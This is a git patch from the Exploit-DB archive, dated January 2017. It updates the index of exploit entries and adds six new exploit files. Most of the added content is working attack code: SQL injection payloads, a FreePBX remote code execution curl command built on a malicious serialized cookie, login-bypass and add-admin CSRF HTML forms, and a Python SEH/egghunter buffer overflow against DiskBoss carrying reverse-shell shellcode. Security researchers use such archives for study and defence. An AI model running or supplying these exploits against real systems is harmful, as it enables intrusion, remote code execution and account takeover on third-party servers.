From 1b13c8a790f462666b663f933f1eb8beaf88ac2d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 11 Jan 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-01-11 6 new exploits DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH) ClaSS 0.8.60 - (export.php ftype) Local File Inclusion ClaSS 0.8.60 - 'export.php' Local File Inclusion Miniweb 2.0 - SQL Injection (Authentication Bypass) Miniweb 2.0 - Authentication Bypass eDNews 2.0 - (lg) Local File Inclusion eDContainer 2.22 - (lg) Local File Inclusion eDNews 2.0 - Local File Inclusion eDContainer 2.22 - Local File Inclusion Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection Ultimate PHP Board 2.2.1 - Privilege Escalation Sepcity Shopping Mall - SQL Injection Sepcity Lawyer Portal - SQL Injection Sepcity Classified - 'classdis.asp ID' SQL Injection FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection Flexphplink 0.0.x - (Authentication Bypass) SQL Injection eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Sepcity Classified - 'ID' Parameter SQL Injection FlexPHPDirectory 0.0.1 - Authentication Bypass Flexphpsite 0.0.1 - Authentication Bypass Flexphplink 0.0.x - Authentication Bypass eDNews 2.0 - SQL Injection PHPAlumni - 'Acomment.php id' SQL Injection PHPAlumni - SQL Injection Flexphpic 0.0.x - (Authentication Bypass) SQL Injection Flexphpic 0.0.x - Authentication Bypass Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection Mole Group Vacation Estate Listing Script - Blind SQL Injection Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass) Friends in War Make or Break 1.3 - Authentication Bypass My Php Dating 2.0 - 'path' Parameter SQL Injection My Php Dating 2.0 - 'id' Parameter SQL Injection My PHP Dating 2.0 - 'path' Parameter SQL Injection My PHP Dating 2.0 - 'id' Parameter SQL Injection Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection Starting Page 1.3 - SQL Injection Freepbx < 2.11.1.5 - Remote Code Execution WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin) --- files.csv | 42 +++++++++++--------- platforms/php/webapps/41002.txt | 42 ++++++++++++++++++++ platforms/php/webapps/41004.txt | 22 +++++++++++ platforms/php/webapps/41005.txt | 37 +++++++++++++++++ platforms/php/webapps/41006.txt | 24 +++++++++++ platforms/php/webapps/41007.html | 32 +++++++++++++++ platforms/windows/remote/41003.py | 66 +++++++++++++++++++++++++++++++ 7 files changed, 247 insertions(+), 18 deletions(-) create mode 100755 platforms/php/webapps/41002.txt create mode 100755 platforms/php/webapps/41004.txt create mode 100755 platforms/php/webapps/41005.txt create mode 100755 platforms/php/webapps/41006.txt create mode 100755 platforms/php/webapps/41007.html create mode 100755 platforms/windows/remote/41003.py diff --git a/files.csv b/files.csv index bde0ceab5..a8185cb52 100644 --- a/files.csv +++ b/files.csv @@ -15204,6 +15204,7 @@ id,file,description,date,author,platform,type,port 40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22 40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0 40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0 +41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -20356,9 +20357,9 @@ id,file,description,date,author,platform,type,port 7574,platforms/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection",2008-12-24,boom3rang,php,webapps,0 7575,platforms/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,php,webapps,0 7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps,0 -7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 +7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,php,webapps,0 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps,0 -7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - SQL Injection (Authentication Bypass)",2008-12-28,bizzit,php,webapps,0 +7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - Authentication Bypass",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,php,webapps,0 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,php,webapps,0 @@ -20369,26 +20370,26 @@ id,file,description,date,author,platform,type,port 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0 -7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 -7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 +7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 +7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0 -7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation",2008-12-29,StAkeR,php,webapps,0 -7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 -7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 +7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - Privilege Escalation",2008-12-29,StAkeR,php,webapps,0 +7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 +7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps,0 7612,platforms/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0 -7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'classdis.asp ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0 -7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 -7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 -7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 -7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection",2008-12-29,"Virangar Security",php,webapps,0 +7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'ID' Parameter SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0 +7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0 +7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0 +7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,php,webapps,0 +7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0 -7621,platforms/php/webapps/7621.txt,"PHPAlumni - 'Acomment.php id' SQL Injection",2008-12-29,Mr.SQL,php,webapps,0 +7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0 7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 -7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Authentication Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0 +7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0 -7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 +7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 @@ -26240,7 +26241,7 @@ id,file,description,date,author,platform,type,port 22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - Browse.asp Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0 22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0 22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0 -22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)",2012-11-15,d3b4g,php,webapps,0 +22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps,0 22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps,0 22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 @@ -36941,5 +36942,10 @@ id,file,description,date,author,platform,type,port 40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0 40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0 40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0 -40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0 -41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0 +40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0 +41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0 +41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0 +41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0 +41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0 +41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0 +41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/41002.txt b/platforms/php/webapps/41002.txt new file mode 100755 index 000000000..01cdd2a6e --- /dev/null +++ b/platforms/php/webapps/41002.txt @@ -0,0 +1,42 @@ +# Exploit : Make or Break 1.7 (imgid) SQL Injection Vulnerability +# Author : v3n0m +# Contact : v3n0m[at]outlook[dot]com +# Date : January, 09-2017 GMT +7:00 Jakarta, Indonesia +# Software : Make or Break +# Version : 1.7 Lower versions may also be affected +# License : Free +# Download : http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9 +# Credits : YOGYACARDERLINK, Dhea Fathin Karima & YOU !! + +1. Description + +An attacker can exploit this vulnerability to read from the database. +The parameter 'imgid' is vulnerable. + + +2. Proof of Concept + +http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null-- + +# Exploitation via SQLMap + +Parameter: imgid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: imgid=1 AND 4688=4688 + Vector: AND [INFERENCE] + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: imgid=1 OR SLEEP(2) + Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + Type: UNION query + Title: Generic UNION query (NULL) - 11 columns + Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ + Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT] + + +3. Security Risk + +The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high. \ No newline at end of file diff --git a/platforms/php/webapps/41004.txt b/platforms/php/webapps/41004.txt new file mode 100755 index 000000000..c11646b06 --- /dev/null +++ b/platforms/php/webapps/41004.txt @@ -0,0 +1,22 @@ +# Vulnerability: Starting Page- SQL Injection + +# Date: 10.01.2017 + +# Vendor Homepage: http://software.friendsinwar.com/ + +# Tested on: win10 + +# Author: JaMbA + +# Script link: http://software.friendsinwar.com/news.php?readmore=31 + +######################### + + +# SQL Injection/Exploit : + +# Vulnerable Parametre : linkid + +# http://localhost/[PATH]/outgoing.php?linkid=[SQL] + +Tunisia 4 ever diff --git a/platforms/php/webapps/41005.txt b/platforms/php/webapps/41005.txt new file mode 100755 index 000000000..bac5aa8a5 --- /dev/null +++ b/platforms/php/webapps/41005.txt @@ -0,0 +1,37 @@ +Exploit Title: Freepbx coockie recordings injection +Google Dork: Ask Santa +Date: 23/12/2016 +Exploit Author: inj3ctor3 +Vendor Homepage: https://www.freepbx.org/ +Software Link: ISO LINKS IN SITE https://www.freepbx.org/ +Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/) +Tested on: Centos 6 +CVE : CVE-2014-7235 + +1. Description + +a critical Zero-Day Remote Code Execution and Privilege Escalation +exploit within the legacy “FreePBX ARI Framework module/Asterisk +Recording Interface (ARI)”. +htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x, +and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie, +related to the PHP unserialize function + + + +A successful attack may compromise the whole system aiding the hacker to gain + +further privileges via taking advantage of famous nmap shell + +without further or do this is a poc code + +curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null + +if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi + \ No newline at end of file diff --git a/platforms/php/webapps/41006.txt b/platforms/php/webapps/41006.txt new file mode 100755 index 000000000..7c5f22502 --- /dev/null +++ b/platforms/php/webapps/41006.txt @@ -0,0 +1,24 @@ +# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation +# Date: 10-01-2017 +# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: web + +1. Description + +You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie(). + +http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html + +2. Proof of Concept + +
+ Username: + + + +
+ +Then you can go to admin panel. \ No newline at end of file diff --git a/platforms/php/webapps/41007.html b/platforms/php/webapps/41007.html new file mode 100755 index 000000000..411aa9bc5 --- /dev/null +++ b/platforms/php/webapps/41007.html @@ -0,0 +1,32 @@ +# # # # # +# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...) +# Google Dork: FMyLife Clone Script +# Date:10.01.2017 +# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm +# Tested on: http://www.tellaboutit.com/admin/ +# Script Name: FMyLife Clone Script (Pro Edition) +# Script Version: 1.1 +# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/ +# Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +#Exploit : + + +

Add an Administrator

+
+
+ + + +
+ + +
+ +
+
+ + +# # # # # diff --git a/platforms/windows/remote/41003.py b/platforms/windows/remote/41003.py new file mode 100755 index 000000000..613d522b8 --- /dev/null +++ b/platforms/windows/remote/41003.py @@ -0,0 +1,66 @@ +#!/usr/bin/python + +# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow +# Date: 10-01-2017 +# Exploit Author: Wyndell Bibera +# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe +# Version: 7.5.12 +# Tested on: Windows XP Professional SP3 + +import socket + +ip = "192.168.86.150" +port = 80 + +egg = "ezggezgg" +nopslide = "\x90" * 8 + +# Bad characters: \x00\x09\x0a\x0d\x20 +# Reverse Shell @ Port 443 - Change shellcode section accordingly +shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1" +"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41" +"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5" +"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f" +"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41" +"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70" +"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8" +"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82" +"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b" +"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86" +"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86" +"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d" +"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80" +"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7" +"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c" +"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92" +"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c" +"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02" +"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1" +"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1" +"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc" +"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a" +"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1" +"\x7e\x97\x50\x56\x7e\xb2") +scpad = "\x90" * (2480 - len(shellcode) - len(nopslide)) +shortjmp = "\xeb\x0f\x90\x90" + +# Search for string 'ezgg' twice +egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + +extra = "\x90" * 9 +pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter)) + +# POP POP RET Instruction +seh = "\x6b\xa6\x02\x10" + +buffer = ( +"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n" +"Host: :192.168.86.150\r\n" +"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" +"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/* ;q=0.8\r\n\r\n") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((ip, port)) +s.send(buffer) +s.close()